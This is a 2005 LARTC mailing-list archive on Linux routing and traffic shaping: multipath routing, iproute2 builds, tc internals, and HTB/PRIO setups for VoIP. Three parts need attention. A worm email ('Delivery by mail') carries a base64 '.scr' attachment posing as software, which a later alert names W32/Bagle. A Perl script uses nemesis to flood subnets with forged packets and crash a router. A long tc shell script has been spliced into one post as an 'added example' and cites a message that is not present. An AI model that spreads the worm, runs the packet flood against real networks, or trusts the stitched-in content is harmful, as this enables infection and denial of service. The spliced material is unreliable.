Date: Wed, 02 Feb 2005 20:21:56 +0100
Subject: [LARTC] How to bond pppoe links
In-Reply-To: <20050202182850.GA5871@legolas.on.net.mk>
References: <20050131222309.GA31550@legolas.on.net.mk> <41FF39C4.2070603@draxinusom.ch> <20050202182850.GA5871@legolas.on.net.mk>
Message-ID: <42012854.7020009@draxinusom.ch>

Damjan wrote:
[..]
>>
>>But for help, I have found the nano-howto extremely useful.
>>http://www.ssi.bg/~ja/nano.txt
>
>
> I think this will work... I've made some preliminary tests, a simple
> multipath default route:
> ip route add default proto static nexthop dev ppp0 nexthop dev ppp1
> and I saw packets going out from both of the interfaces.
>
> I've also tried to setup MLPPP on the PPPOE links but it seems that the
> DSLAM on the other side didn't support this.

If you want true bonding, you need someone on the other side of the links to "unbundle" for you. That means either your ISP(s) or you can also have a system on the internet and create a tunnel to that host over the links. It was described today under the subject "Packet Level Load Balance inbound/outbound success with nth and route".

If you are not going to get a cooperative partner on the other side of the links, the loadbalancing described in nano is about the best you can do.

Please note that you absolutely need some of the other lines if you have incoming traffic. Traffic might come in through one but leave by the other interface with the wrong IP address otherwise. This is not always bad and often works if all links go over the same ISP. I have one cable and one dsl line from two different providers. I had a bit asymmetric routing until I corrected it.

--
C U

- -- ---- ----- -----/\/ René Gallati \/\---- ----- --- -- -

From shemminger@osdl.org Wed Feb 2 21:24:28 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Wed, 2 Feb 2005 13:24:28 -0800
Subject: [LARTC] doubts: cross compiling iproute2
In-Reply-To: <20050202174802.72999.qmail@web41508.mail.yahoo.com>
References: <20050202174802.72999.qmail@web41508.mail.yahoo.com>
Message-ID: <20050202132428.19cca099@localhost.localdomain>

On Wed, 2 Feb 2005 09:48:02 -0800 (PST) js si wrote:

> i tried to cross compile iproute2 on a linux machine using a cross compiler for ppc750.
i have some questions: > > 1) make tries to execute tc/normal, tc/paretonormal, tc/pareto to make distribution files like normal.dist > because i am cross compiling the object files can't be executed. will it suffice if i copy the distribution files from my linux iproute2 compilation to the /usr/lib/tc directory on the ppc? Format of these files is text, intentionally to make them portable > 2)i can't locate db_185.h for the ppc. so i don't specify DBM_INCLUDE in the make file. i get compilation errors in the misc directory. the thing is that i want to only use the tc command from the iproute2 package. is tc independent from whatever is compiled in the misc directory? actually tc worked on the ppc, but i just had a doubt. Only needed for arpd, which you probably don't need > thanks. > > > --------------------------------- > Do you Yahoo!? > Yahoo! Search presents - Jib Jab's 'Second Term' From dan@coverfire.com Wed Feb 2 21:26:26 2005 From: dan@coverfire.com (Dan Siemon) Date: Wed, 02 Feb 2005 16:26:26 -0500 Subject: [LARTC] Issue with using using tc api In-Reply-To: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> References: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> Message-ID: <1107379586.29448.2.camel@ganymede> On Thu, 2005-03-02 at 00:42 +0800, sanjeev ravindran wrote: > I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I could compile it with my stub program and got the executable. However, when i try to create an htb qdisc i get the following error : Unknown qdisc "htb", hence option "default" is unparsable > > However, if i use the tc tool, it works fine.. When I tried to understand the problem, it appeared to be failing of dlopen to load the module.. But when i use tc tool, it loads this module.. The internal code of TC is not designed to be used by other projects. LQL[1] may be closer to what you want. Or if you prefer C#, I will be releasing lql-sharp in the next day or so. 
[1] - http://www.coverfire.com/lql/ -- OpenPGP key: http://www.coverfire.com/files/pubkey.txt Key fingerprint: FB0A 2D8A A1E9 11B6 6CA3 0C53 742A 9EA8 891C BD98 From shemminger@osdl.org Wed Feb 2 21:28:53 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Wed, 2 Feb 2005 13:28:53 -0800 Subject: [LARTC] Issue with using using tc api In-Reply-To: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> References: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> Message-ID: <20050202132853.5d550932@localhost.localdomain> On Thu, 03 Feb 2005 00:42:52 +0800 "sanjeev ravindran" wrote: > Hi , > > I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I could compile it with my stub program and got the executable. However, when i try to create an htb qdisc i get the following error : Unknown qdisc "htb", hence option "default" is unparsable > > However, if i use the tc tool, it works fine.. When I tried to understand the problem, it appeared to be failing of dlopen to load the module.. But when i use tc tool, it loads this module.. Tc command is hard to understand because it supports using dynamic libraries to add new queue disciplines. To find a queue discipline it first looks for q_XXX.so then opens it's own text with dlopen() and finds the necessary table hooks. This kind of dynamic binding is uncommon in C code, but allows for extensibility. Normally tc has most queue discipline support (ie q_htb) linked into the command directly, but you could build q_htb.so standalone as well. From rsenykoff@harrislogic.com Wed Feb 2 23:12:33 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Wed, 2 Feb 2005 17:12:33 -0600 Subject: [LARTC] PRIO / CBQ / HTB queue drop algorithm Message-ID: This is a multipart message in MIME format. --=_alternative 007F7DF186256F9C_= Content-Type: text/plain; charset="US-ASCII" Hello all. I've been struggling to QoS VoIP at our site and have a successful implementation at this point. 
Basically I had to set aside enough bandwidth for VoIP by placing all other traffic behind an HTB (multiple classes and queues behind it). Everything is fine. Here's the diagram:

         -------
         | eth |
         -------
            |
         --------
         | PRIO |
         --------
       /          \
    1/             2\
---------             \
| PFIFO |       ---------------------
| VoIP  |       | Hier. Token Bucket | <-- throttled so it + VoIP won't overrun
---------       ----------------------     the ethernet link (we know how many
              /     2|        3|       \   phones we have so this is possible
           1/    --------- ---------    4\ until you get into conferencing etc)
      ---------  | PFIFO | | PFIFO |   ---------
      | PFIFO |  | video | | inst. |   | fair  |
      |citrix |  --------- | msgr  |   | SFQ   |
      ---------            ---------   | bulk  |
                                       ---------

I tried using CBQ and HTB as the higher level queues, but it seems that with lending of traffic out, there is a delay (waiting for space in the queue) where packets from VoIP will get dropped until there's space. I'm guessing that the queues all use a basic tail-drop algorithm.

Have I been doing something wrong? It sure would be cool to be able to provide immediate bandwidth to VoIP (and other interactive applications) while still letting those interactive traffic classes lend out bandwidth. For example, an option on PRIO that lets you specify random drop, and what bands to drop from. Thus, if a VoIP packet arrives and the queue is full, rather than dropping the VoIP packet, randomly drop a packet from the bulk traffic band of the PRIO queue.

Any thoughts on this are very welcome.

TIA!
-Ron S.

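The tree in Ron's diagram written out as tc commands, with each filter attached to the qdisc whose classes it selects (the PRIO restriction quoted in Viktor Horvath's message earlier in this archive) and the u32 catch-all he suggests, plus a check that flags filters pointing into another qdisc. This is an added example, not code from any poster on the list. Assumptions: device eth0, the rates, handles and queue limits, VoIP marked with TOS 0xb8, Citrix on TCP port 1494, and firewall marks 2 (video) and 3 (instant messaging) set elsewhere with iptables.

```shell
#!/bin/sh
# Added example: dry-run generator for the PRIO -> (pfifo | HTB) tree in the
# diagram. Device, rates, handles, marks and ports are constructed assumptions.

# emit_qos DEV LINK_KBIT VOIP_KBIT: print the tc commands, one per line.
emit_qos() {
    dev=$1; link=$2; voip=$3
    # HTB is capped at what the link has left after the VoIP reservation,
    # so HTB + VoIP cannot overrun the link.
    if [ "$voip" -ge "$link" ]; then
        echo "VoIP reservation must be below the link rate" >&2
        return 1
    fi
    rest=$((link - voip))
    share=$((rest / 4))   # assumed even guarantee per HTB leaf

    # Root PRIO with two bands. The default priomap refers to a third band,
    # so with "bands 2" it is given explicitly: every priority -> second band (1:2).
    echo "tc qdisc add dev $dev root handle 1: prio bands 2 priomap 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
    echo "tc qdisc add dev $dev parent 1:1 handle 10: pfifo limit 30"
    echo "tc qdisc add dev $dev parent 1:2 handle 20: htb default 40"

    # HTB side: one capped parent, four leaves that may borrow up to the cap.
    echo "tc class add dev $dev parent 20: classid 20:1 htb rate ${rest}kbit ceil ${rest}kbit"
    for leaf in 10 20 30 40; do
        echo "tc class add dev $dev parent 20:1 classid 20:$leaf htb rate ${share}kbit ceil ${rest}kbit"
    done
    echo "tc qdisc add dev $dev parent 20:10 handle 110: pfifo limit 50"   # citrix
    echo "tc qdisc add dev $dev parent 20:20 handle 120: pfifo limit 50"   # video
    echo "tc qdisc add dev $dev parent 20:30 handle 130: pfifo limit 50"   # instant messaging
    echo "tc qdisc add dev $dev parent 20:40 handle 140: sfq perturb 10"   # bulk

    # Filters on the PRIO qdisc (parent 1:) select only PRIO's own classes.
    # The second one is the u32 catch-all form from Viktor's message.
    echo "tc filter add dev $dev parent 1: protocol ip prio 1 u32 match ip tos 0xb8 0xff flowid 1:1"
    echo "tc filter add dev $dev parent 1: protocol ip prio 2 u32 match ip src 0.0.0.0/0 flowid 1:2"
    # Filters on the HTB qdisc (parent 20:) select HTB leaves; the rest falls to 20:40.
    echo "tc filter add dev $dev parent 20: protocol ip prio 1 u32 match ip dport 1494 0xffff flowid 20:10"
    echo "tc filter add dev $dev parent 20: protocol ip prio 2 handle 2 fw flowid 20:20"
    echo "tc filter add dev $dev parent 20: protocol ip prio 3 handle 3 fw flowid 20:30"
}

# alien_filters: read tc commands on stdin and print every filter whose flowid
# major differs from the major of the qdisc the filter is attached to.
alien_filters() {
    awk '$1 == "tc" && $2 == "filter" {
        parent = ""; flow = ""
        for (i = 3; i < NF; i++) {
            if ($i == "parent") parent = $(i + 1)
            if ($i == "flowid") flow = $(i + 1)
        }
        split(parent, p, ":"); split(flow, f, ":")
        if (p[1] != f[1]) print
    }'
}

# run_qos DEV LINK_KBIT VOIP_KBIT: dry run by default; APPLY=1 (as root) executes.
run_qos() {
    cmds=$(emit_qos "$@") || return 1
    bad=$(printf '%s\n' "$cmds" | alien_filters)
    if [ -n "$bad" ]; then
        echo "filter targets a class of another qdisc: $bad" >&2
        return 1
    fi
    if [ "${APPLY:-0}" = 1 ]; then
        printf '%s\n' "$cmds" | sh -e
    else
        printf '%s\n' "$cmds"
    fi
}

run_qos "${1:-eth0}" "${2:-2000}" "${3:-400}"
```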
--=_alternative 007F7DF186256F9C_=-- From shiman@magma.com.pl Thu Feb 3 00:59:42 2005 From: shiman@magma.com.pl (=?iso-8859-2?Q?Maciej_Szyma=F1ski?=) Date: Thu, 3 Feb 2005 01:59:42 +0100 Subject: [LARTC] Kernel panic when using wrr qd Message-ID: <002e01c5098b$a51f1930$ac15a8c0@shimanesq> For some time now im trying to get to know what causes such configuration of QOS (kernel 2.4.25-2.4.28 + IMQ patch and ofcourse wrr): -- WRR_MAX_CLASSES=200 DEV_IN=imq0 ifconfig $DEV_IN down ifconfig $DEV_IN up tc qdisc add dev ${DEV_IN} handle 1:0 root htb default 10 tc class add dev ${DEV_IN} parent 1:0 classid 1:10 htb rate 1000kbit burst 1kbit prio 1 tc qdisc add dev ${DEV_IN} parent 1:10 handle 10: htb default 190 tc class add dev ${DEV_IN} parent 10: classid 10:10 htb rate 1000kbit burst 20kbit prio 1 tc class add dev ${DEV_IN} parent 10:10 classid 10:190 htb rate 500kbit ceil 900kbit burst 10k prio tc qdisc add dev ${DEV_IN} parent 10:190 handle 190: wrr dest ip $WRR_MAX_CLASSES 0 ###tc qdisc add dev ${DEV_IN} parent 10:190 handle 190:0 esfq perturb 10 limit 64 depth 64 divisor 11 echo "IMQ dev 0 start" /sbin/iptables -F -t mangle /sbin/iptables -A PREROUTING -t mangle -i $DEV_OUT -j IMQ --todev 0 -- Runnig the above and testing it with random packets generated by Nemesis (http://nemesis.sourceforge.net) results in Kernel Panic with random process pid. The packet generation script (destination adresses altered). File router_killer: -- #!/usr/bin/perl $port=9898; for ($c = 1; $c < 100; ++$c) { for ($i = 1; $i < 254; ++$i) { `nemesis tcp -v -S 222.65.61.222 -D 80.50.30.$i -fSA -w 64800 -T 128 -y $port `; `nemesis tcp -v -S 222.65.61.222 -D 80.50.31.$i -fSA -w 64800 -T 128 -y $port `; } } exit(0); -- To kernel panic to occur the subnets 80.50.30.0/24, 80.50.31/24 must be routed to a router witch runs IMQ. 
Generally speaking it looks as the wrr algorithm from the implementation found at http://wipl-wrr.dkik.dk/wrr/ does not handle larger amounts of IP adresses generated in a short period of time. The tests we ran showed up that the problem lies (at 99%) in the WRR. After running the "router_killer" script in a few seccond the kernel panics. Changeing the queuing algorithm from WRR to ESFQ (in fact commenting the first line of script 1) helps - the router is able to work properly under heavy load (simulated attack). That's how i've come to the conclusion that the problem lies in the WRR itself. Sources of the algo were modified on many ways, everything ending up with the same - kernel panic. From observations we can assume that this is not the problem of filling up the queue because the algorithm should handle it pretty well. If an packet does not fit the queue it gets dropped and also the whole communication afterwards till the queue gets freed. And as we know the queue is controlled by the Qdisc structure and it's mechanisms and not the WRR if ((retvalue=qdisc->enqueue(skb, qdisc)) == ENQUEUE_SUCCESS) { // Successfull sch->stats.packets++; ... if(retvalue!=ENQUEUE_SUCCESS) { // Packet not enqued: sch->stats.drops++; It does not look that the queue could "fill up". Can somebody help (the problem is interresting, im thinking bout posting it on lartc...)? PS1. I've not checked the wrr device implemetation because it's beeing used as a class not as a queuing discipine. Will not work for me. PS2. HTB parameters (rate, ceil) do not matter as the system screws up with every possible combination. From sanjeev_ravindran@linuxmail.org Thu Feb 3 03:43:40 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Thu, 03 Feb 2005 11:43:40 +0800 Subject: [LARTC] Issue with using using tc api Message-ID: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com> Thank you so much for ur response Stephen, Ya, I found that dlopen tries to load q_htb.so.. 
and it fails..

I tried to locate q_htb.so in my rh9 machine.. but i couldn't locate it..

Could you let me know how build q_htb.so standalone ??

Thanks in advance,
With best regards,
Sanjeev Ravindran

----- Original Message -----
From: "Stephen Hemminger"
To: "sanjeev ravindran"
Subject: Re: [LARTC] Issue with using using tc api
Date: Wed, 2 Feb 2005 13:28:53 -0800

>
> On Thu, 03 Feb 2005 00:42:52 +0800
> "sanjeev ravindran" wrote:
>
> > Hi ,
> >
> > I'm trying to call the tc_qdisc_modify function of tc in
> > iproute2/tc. I could compile it with my stub program and got the
> > executable. However, when i try to create an htb qdisc i get the
> > following error : Unknown qdisc "htb", hence option "default" is
> > unparsable
> >
> > However, if i use the tc tool, it works fine.. When I tried to
> > understand the problem, it appeared to be failing of dlopen to
> > load the module.. But when i use tc tool, it loads this module..
>
> Tc command is hard to understand because it supports using dynamic
> libraries to add new queue disciplines.
> To find a queue discipline it first looks for q_XXX.so then opens
> it's own text with dlopen() and finds the
> necessary table hooks. This kind of dynamic binding is uncommon in
> C code, but allows for extensibility.
>
> Normally tc has most queue discipline support (ie q_htb) linked
> into the command directly, but
> you could build q_htb.so standalone as well.

From beatlelittle@yahoo.com.cn Thu Feb 3 06:08:24 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Thu, 3 Feb 2005 14:08:24 +0800 (CST)
Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files?
In-Reply-To: <200501311715.15302.stef.coene@docum.org>
Message-ID: <20050203060824.52996.qmail@web15504.mail.cnb.yahoo.com>

Thanks a lot, it's really a good way, I'll try it!
 

Stef Coene <stef.coene@docum.org> wrote:
On Monday 31 January 2005 04:26, CcM wrote:
> I'm trying to get picture from ethloop and gnuplot. But the output seems
> weird. I still do not know why and want some examples.
>
> Thanks in advance.
This is the only script I found.
It uses monitor.pl that I use to get the counters. But you can also see the
original code from Devik in comments that uses ethloop. I hope this will
help you.
burst.sh is a script that creates the tc setup I want to test. client1 and
client2 are actually ttcp commands to generate traffic. So the script
launches 2 programs to generate traffic, monitor.pl to get some counters,
kills the running ttcp programs, parses the output and uses gnuplot to plot it.

# set -x
CEIL="1000kbps"

./burst.sh $CEIL

(sleep 3 ; ./client1 ) &
(sleep 6 ; ./client2 ) &

monitor.pl end=30 sleep=500000
kill `ps -ef | grep ttcp | awk '{print $3}'`
kill `ps -ef | grep ttcp | awk '{print $2}'`
DATA=/tmp/bb_speed.log
PIX="OUT.png"

#DATA=$1.out
#PROG=$1
#PIX=$2.png
#if [ "$2" = "" ]; then PIX=$1.png; fi

#ethloop < $1 > $1.out

#cat >.plotperl <<"EOF"
#$ln=0; $lx=-1000;
#while (<>) {
#if(/^(\d+)\s+R\s+(\d+)\s+(\d+)/) {
#$x = $1/1000; $y = -0.1; $y1 = $y+0.02; $y2 = $y + 0.05;
#if ($x-$lx<2) { $ln=($ln+1)%3; } else { $ln=0; }
#$y-=$ln*0.04; $lx=$x; $lb=$3;
#$lb=int($3/1000)."k" if ($lb>=10000);
#print "set label '$2:$lb' at $x,graph $y center\n";
#print "set arrow from $x,graph $y1 to $x,graph $y2\n";
#}
#}
#EOF
#perl .plotperl $PROG > .plot

cat >.plot <<EOF
set y2t
set title "HTB burst test, ceil = $CEIL"
set grid
set nokey
set bmargin 5
set key spacing 1.4 box
set data style linespoints
set term png medium color xffffff x000000 x404040 xc00000 x009000 x0000ff xc09000 xc000c0 x0090c0 x804020
#set term png small xffffff x000000 x404040 xc00000 x009000 x0000ff \\
#xc09000 xc000c0 x0090c0 x804020
set out "$PIX"
set label "time [s]" at graph -0.02,graph -0.05 right
set ylabel "rate [Bps]"
set ytics nomirror
#set noy2tics

plot '$DATA' using (\$1/2):2 title 'flow 1 rate',\\
'$DATA' using (\$1/2):4 title 'flow 2 rate',\\
'$DATA' using (\$1/2):(\$2+\$4) title 'total rate (0+1)'

EOF

gnuplot .plot
#xview $PIX
cp $PIX $CEIL.png
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/



From beatlelittle@yahoo.com.cn Thu Feb 3 06:11:57 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Thu, 3 Feb 2005 14:11:57 +0800 (CST)
Subject: [LARTC] What does flowid:1 mean here?
Message-ID: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com>

Hi,
     I got the following lines from 'Linux Advanced Routing & Traffic Control HOWTO' and got confused!
 
     iptables -A PREROUTING -i $INDEV -t mangle -p tcp --syn \
     -j MARK --set-mark 1
     tc qdisc add dev $INDEV handle ffff: ingress
     tc filter add dev $INDEV parent ffff: protocol ip prio 50 handle 1 fw \
     police rate 1kbit burst 40 mtu 9k drop flowid :1
 
     Does the second command mean that the filter will police the traffic of syn to 1kbit by dropping? What does flowid:1 mean here?
 
Thanks in advance.
CcM



From 64vn@cardvn.net Thu Feb 3 07:46:41 2005
From: 64vn@cardvn.net (Nguyen Dinh Nam)
Date: Thu, 03 Feb 2005 14:46:41 +0700
Subject: [LARTC] Tutorial: Setting up a server with multiple internet connections
Message-ID: <4201D6E1.2010508@cardvn.net>

I know people are using nano-howto (http://www.ssi.bg/~ja/nano.txt) to
configure a multihomed server, but I don't like its approach, and it
doesn't offer a complete solution, especially, AFAIK, nano-howto doesn't
tell you to bind each TCP connection to just one up-link, so connections
will be lost when routing cache expires (most ISPs DROP ip spoofing
traffic)

So I wrote a tutorial, I hope that it'll make your life easier:
http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking

Your comment is welcome, you can even edit the wiki page directly if
desired.

From sujith.chennupati@gmail.com Thu Feb 3 11:12:44 2005
From: sujith.chennupati@gmail.com (Sujith.chennupati)
Date: Thu, 03 Feb 2005 16:42:44 +0530
Subject: [LARTC] Delivery by mail
Message-ID:

----------iqmoxupifwqudqqiywkx
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Thanks for use of our software.
----------iqmoxupifwqudqqiywkx
Content-Type: application/octet-stream; name="guupd02.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="guupd02.scr"
zABmAMwAmQDMAMwAmTMAAMwzMwDMM2YAzDOZAMwzzADMM/8AzGYAAMxmMwCZZmYAzGaZAMxm zACZZv8AzJkAAMyZMwDMmWYAzJmZAMyZzADMmf8AzMwAAMzMMwDMzGYAzMyZAMzMzADMzP8A zP8AAMz/MwCZ/2YAzP+ZAMz/zADM//8AzAAzAP8AZgD/AJkAzDMAAP8zMwD/M2YA/zOZAP8z zAD/M/8A/2YAAP9mMwDMZmYA/2aZAP9mzADMZv8A/5kAAP+ZMwD/mWYA/5mZAP+ZzAD/mf8A /8wAAP/MMwD/zGYA/8yZAP/MzAD/zP8A//8zAMz/ZgD//5kA///MAGZm/wBm/2YAZv//AP9m ZgD/Zv8A//9mACEApQBfX18Ad3d3AIaGhgCWlpYAy8vLALKysgDX19cA3d3dAOPj4wDq6uoA 8fHxAPj4+ADw+/8ApKCgAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP//AAD///8Ap6enp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp////wenp6enB////6enp6f//6enp6enp6en //+np6en/6enp6enp6enp6f/p6enpwenp6enp6f//6enB6enp6enp6f/p6f///+np6enp6en p6en/6f///+np6enp6enp6enp/////+np6enp6enp6enp6f///+np6enp6enp6enB6en//// //+np6cHp6enp/+np6enp6enp6en/6enp6f//6enp6enp6en//+np6en////B6enp6cH//// p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enpwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAMAAAAGAA AAABAAgAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAA gIAAAMDAwADA3MAA8MqmAAQEBAAICAgADAwMABEREQAWFhYAHBwcACIiIgApKSkAVVVVAE1N TQBCQkIAOTk5AIB8/wBQUP8AkwDWAP/szADG1u8A1ufnAJCprQAAADMAAABmAAAAmQAAAMwA ADMAAAAzMwAAM2YAADOZAAAzzAAAM/8AAGYAAABmMwAAZmYAAGaZAABmzAAAZv8AAJkAAACZ MwAAmWYAAJmZAACZzAAAmf8AAMwAAADMMwAAzGYAAMyZAADMzAAAzP8AAP9mAAD/mQAA/8wA MwAAADMAMwAzAGYAMwCZADMAzAAzAP8AMzMAADMzMwAzM2YAMzOZADMzzAAzM/8AM2YAADNm MwAzZmYAM2aZADNmzAAzZv8AM5kAADOZMwAzmWYAM5mZADOZzAAzmf8AM8wAADPMMwAzzGYA M8yZADPMzAAzzP8AM/8zADP/ZgAz/5kAM//MADP//wBmAAAAZgAzAGYAZgBmAJkAZgDMAGYA /wBmMwAAZjMzAGYzZgBmM5kAZjPMAGYz/wBmZgAAZmYzAGZmZgBmZpkAZmbMAGaZAABmmTMA ZplmAGaZmQBmmcwAZpn/AGbMAABmzDMAZsyZAGbMzABmzP8AZv8AAGb/MwBm/5kAZv/MAMwA /wD/AMwAmZkAAJkzmQCZAJkAmQDMAJkAAACZMzMAmQBmAJkzzACZAP8AmWYAAJlmMwCZM2YA mWaZAJlmzACZM/8AmZkzAJmZZgCZmZkAmZnMAJmZ/wCZzAAAmcwzAGbMZgCZzJkAmczMAJnM /wCZ/wAAmf8zAJnMZgCZ/5kAmf/MAJn//wDMAAAAmQAzAMwAZgDMAJkAzADMAJkzAADMMzMA zDNmAMwzmQDMM8wAzDP/AMxmAADMZjMAmWZmAMxmmQDMZswAmWb/AMyZAADMmTMAzJlmAMyZ 
mQDMmcwAzJn/AMzMAADMzDMAzMxmAMzMmQDMzMwAzMz/AMz/AADM/zMAmf9mAMz/mQDM/8wA zP//AMwAMwD/AGYA/wCZAMwzAAD/MzMA/zNmAP8zmQD/M8wA/zP/AP9mAAD/ZjMAzGZmAP9m mQD/ZswAzGb/AP+ZAAD/mTMA/5lmAP+ZmQD/mcwA/5n/AP/MAAD/zDMA/8xmAP/MmQD/zMwA /8z/AP//MwDM/2YA//+ZAP//zABmZv8AZv9mAGb//wD/ZmYA/2b/AP//ZgAhAKUAX19fAHd3 dwCGhoYAlpaWAMvLywCysrIA19fXAN3d3QDj4+MA6urqAPHx8QD4+PgA8Pv/AKSgoACAgIAA AAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoK Cgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6enp6enp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6en//////////////// //////////////////////////+np6enCgoKCgoKCgqnp6en//////////////////////// //////////////////+np6enCgoKCgoKCgqnp6en//////////////////////////8Hp6en p/////////+np6enCgoKCgoKCgqnp6en/////////////////////////6enp6enp6f///// //+np6enCgoKCgoKCgqnp6en////////////////////////p6enp///p6f///////+np6en CgoKCgoKCgqnp6en//////////////////////+np6enp///p6f///////+np6enCgoKCgoK Cgqnp6en///////x7+ynp6en7O///6enp/+np///p6f///////+np6enCgoKCgoKCgqnp6en /////++np6enp6enp6enp6en//+np6enp/////////+np6enCgoKCgoKCgqnp6en////76en p6enp6enp6enp6f///8Hp6en//////////+np6enCgoKCgoKCgqnp6en///vp6enp6enp6en p6enp6fv////p6en//////////+np6enCgoKCgoKCgqnp6en//Gnp6enp6enp6enp6enp6en /////6enp/////////+np6enCgoKCgoKCgqnp6en/++np6enp6enp6en//+np6en7/////+n p6f///////+np6enCgoKCgoKCgqnp6en/+ynp6enp6enp6f///+np6en7P//////p6en//// //+np6enCgoKCgoKCgqnp6en/6enp6enp6en/////6enp6enp////////6enp/////+np6en CgoKCgoKCgqnp6en/6enp6f/p6en/6f/p6enp6enp/////////+np6f///+np6enCgoKCgoK Cgqnp6en/6enp6f/p6f/////p6enp6enp///////////p6cH//+np6enCgoKCgoKCgqnp6en 
/6enp6f//////6enp6enp6enp///////p6enp6en//+np6enCgoKCgoKCgqnp6en/+ynp6f/ ////p6enp6enp6en7P////+np6enp6en//+np6enCgoKCgoKCgqnp6en/++np6f/////p6en p6enp6en7////6enp////6en//+np6enCgoKCgoKCgqnp6en//+np6f///////+np6enp6en ////p6en/////6en//+np6enCgoKCgoKCgqnp6en///vp6enp6enp6enp6enp6fv//+np6f/ /////6en//+np6enCgoKCgoKCgqnp6en////76enp6enp6enp6enp6f//6enp///////p6cH //+np6enCgoKCgoKCgqnp6en/////++np6enp6enp6enp6enp6en//////+np6f///+np6en CgoKCgoKCgqnp6en////////7+ynp6en7O///6enp6f//////6enp/////+np6enCgoKCgoK Cgqnp6en/////////////////////6enp///////p6en//////+np6enCgoKCgoKCgqnp6en ////////////////////p6en//////+np6f///////+np6enCgoKCgoKCgqnp6en//////// //////////+np6f//////6enp/////////+np6enCgoKCgoKCgqnp6en//////////////// /6enp///////p6en//////////+np6enCgoKCgoKCgqnp6en/////////////////wenp6en p6enp6f///////////+np6enCgoKCgoKCgqnp6en////////////////////B6enp6enB/// //////////+np6enCgoKCgoKCgqnp6en//////////////////////////////////////// //+np6enCgoKCgoKCgqnp6en//////////////////////////////////////////+np6en CgoKCgoKCgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoK Cgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6enp6enp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCv///////wAA////////AAD///////8AAP///////wAA8AAAAAAPAADwAAAA AA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAA AAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA 8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAP AADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAA AA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAA 
From techsupport@sqliaison.com Thu Feb 3 11:15:51 2005
From: techsupport@sqliaison.com (techsupport@sqliaison.com)
Date: Thu, 3 Feb 2005 06:15:51 -0500
Subject: [LARTC] SQLiaison E-Mail Virus Alert
Message-ID: <000001c509e1$b84f3f20$50f7cdcd@sqliaison.com>

SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.
Please note that the sender of the email will not be notified with this message.

> More information :
Date/Time sent: 03 Feb 2005 06:15:50
Subject line: [LARTC] Delivery by mail
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle.bj@MM
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team
